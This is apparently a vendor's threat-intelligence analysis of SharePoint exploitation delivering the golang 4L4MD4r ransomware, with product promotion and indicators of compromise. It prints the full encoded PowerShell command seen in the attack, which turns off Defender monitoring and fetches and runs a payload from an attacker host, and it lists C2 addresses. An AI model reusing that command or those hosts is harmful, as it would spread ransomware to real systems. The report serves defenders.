background
July 2025 Microsoft SharePoint The server exposed a serious remote code execution (RCE) vulnerability ( CVE-2025-49704/CVE-2025-49706/CVE-2025-53770/CVE-2025-53771). This vulnerability has been widely exploited by hacker groups and affects tens of thousands of servers worldwide. The Red RedDrip Team of Qi'anxin Threat Intelligence Center immediately analyzed the vulnerability and monitored it on the terminal side. On July 27, we observed that a SharePoint server deployed on the external network of a medical customer was hacked and a malicious PowerShell command was executed, but it was intercepted by TianQing, and subsequent analysis revealed the 4L4MD4r ransomware, written in golang. Its function names have a strong religious connotation. According to reports from friendly companies [1], this weapon seems to belong to mimo group, a Turkish threat actor with financial motivations.
We recommend that government and enterprise customers deploy TianQing in both office and server areas. This vulnerability can be intercepted when TianQing's "Liuhe" advanced threat defense engine is enabled.
Sample analysis
The process chain we observed is as follows:
| - | - |
|---|---|
| Grandparent process | |
| c:\windows\system32\inetsrv\w3wp.exe - ap "SharePoint - 80" -v "v4.0" **** | |
| Parent process | |
| C:\Windows\System32\cmd.exe | |
| Target process | |
| powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAIAAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgACQAdABlAG0AcABmAGkAbABlACAAKwA9ACAAJwAuAGUAeABlACcAOwAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAGMAZQAuAHQAaABlAGkAbgBuAG8AdgBhAHQAaQBvAG4AZgBhAGMAdABvAHIAeQAuAGkAdAAvAHMAdABhAHQAaQBjAC8ANABsADQAbQBkADQAcgAuAGUAeABlACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA= |
The decoded content is as follows, the main function is to download.
Download the payload from the Italian springboard website and executed, but was intercepted by TianQing.
| - | - |
|---|---|
| Springboard URL | |
| https://ice.theinnovationfactory.it/static/4l4md4r.exe |
Based on VT Data, we obtained 4l4md4r.exe.
A new type of ransomware written in the golang, with function names that have a strong religious connotation:
Relevant to Shia Islam religious language:
The 4L4MD4r ransomware appears to be the first delivery from the Mino group, and it first decrypts the final payload in memory.
Afterwards, memory will be requested to load the decrypted PE file.
Finally, the new thread is created for execution.
The decrypted and loaded PE file is the 4l4md4r ransomware. It will first perform a time check for anti-debugging purposes and terminate the operation if it times out.
The computer name will then be obtained and an ID and enckey ( used to encrypt files ), merged into one json.
The json The content is encrypted and uploaded to http://bpp.theinnovationfactory.it:445.
If the sending fails more than three times, the operation will also be terminated.
the upload is successful , encryption will begin. enckey Encrypt the file, and the encrypted file name will be converted into the base64 format of the original file name.
After the file encryption is completed, a ransom note DECRYPTION_INSTRUCTIONS.html and a list of encrypted files NCRYPTED_LIST.html will be generated on the desktop.
The ransom note reads as follows:
Contact Email: m4_cruise@proton.me
Encrypted suffix: .4l4md4r
For encryption json The public key is as follows:
After querying, the BTC provided by the attacker Wallet has 40 There is no transfer record with an amount of 0.005BTC. This means that no victim has paid the ransom to the 4l4md4r ransomware so far.
Summarize
At present, the full range of products based on threat intelligence data from Qi'anxin Threat Intelligence Center, including Qi'anxin Threat Intelligence Platform (TIP), TianQing, Tianyan Advanced Threat Detection System, Qi'anxin NGSOC, Qi'anxin Situational Awareness, etc., already support accurate detection of such attacks.
IOC
MD5:
90f71cb5df71ae3845ff81edd776b287
C2:
hxxps://ice.theinnovationfactory.it/static/4l4md4r.exe
bpp.theinnovationfactory.it:445
Reference Links
[1]. https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-ca mpaign-targeting-craft-cms/